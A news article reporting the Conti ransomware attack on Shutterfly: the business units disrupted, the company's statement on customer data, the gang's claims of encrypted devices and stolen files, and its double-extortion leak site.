Shutterfly reports the ransomware attack, supposedly Conti virus group

Digital photography company reported the ransomware attack over the weekend

The company reported the attack tat is linked with Conti ransomware group now

The services got disrupted and the particular ransomware group, according to some sources. Personalized photography giant suffered the ransomware attack that led to encryption of data on devices and potentially resulted in stolen corporate files.^[1] Conti ransomware^[2] supposedly blamed for the attack. According to the company, parts of the Lifetouch and BorrowLenses business got affected. The interruption was experienced with Groovebook, manufacturing offices, other corporate systems also.^[3]

law enforcement has been contacted and reacted to this cybersecurity incident. Also, the company states that customer-sensitive details are not accessed to calm the ones who might be affected:

As part of our ongoing investigation, we are also assessing the full scope of any data that may have been affected. We do not store credit card, financial account information, or the Social Security numbers of our Shutterfly.com, Snapfish, Lifetouch, TinyPrints, BorrowLenses, or Spoonflower customers, and so none of that information was impacted in this incident.

The company name Shutterfly is associated with the website, photography-related services offered for customers, enterprises, education customers. Various brands are related to these services like BorrowLenses, Snapfish, Lifetouch, and GrooveBook. The main Shutterfly.com site can be used to upload photos, create photo books, greeting cards, postcards, personalized stationary, and many more.

Conti ransomware group encrypted 4 000 devices

It is reported,^[4] that the Conti file virus is the one to blame. The attack was active for a few days, and the malware gang claims to have encoded at least 4 thousand devices and 120 servers. Not confirmed from the company, but negotiations were held between the attackers and officials.

Cybercriminals demanded millions of dollars for the ransom. This payment is demanded in exchange for the possible file recovery tool. Malware can run in the background for days or weeks, so the infection can obtain documents, corporate data, and other files to later use such pieces for leverage, so victims get forced to pay the demanded sum in cryptocurrency.

Obtained data threatened to be publicly leaked

Conti ransomware gang created the data leak page for the Shutterfly files. Screenshots of files supposedly stolen from devices and servers during the infection were displayed there. The double-extortion^[5] tactics becoming more popular among ransomware creators. The blackmailers claim to make the site public for the people if their money demands are not met.

The screenshots provided on the site included the legal agreements, bank information, merchant account details, login credentials for services, spreadsheets, some customer information with parts of the numbers from credit cards. Conti group also claimed to obtain the source code for the Shutterfly store, but it is not confirmed what website these criminals have in mind particularly.

The attack started a few weeks ago and the deep dive in conversations and discussions on various forums where members of the particular gang talked about the possibilities to exploit the Log4j vulnerabilities.^[6] The sophisticated ransomware group might possibly weaponize the flaw to access the servers and find their way on valuable data storing systems and devices.

Conti ransomware gang have already made headlines for their attacks, and research on the logs show that the creators have already made $150 million in the last six months. The expansion of the group started in November when the attackers researched and started to use new vectors and actively target vCenter networks. Researchers reported at least 400 attacks involving the particular Conti malware targeting organizations in US and international enterprises.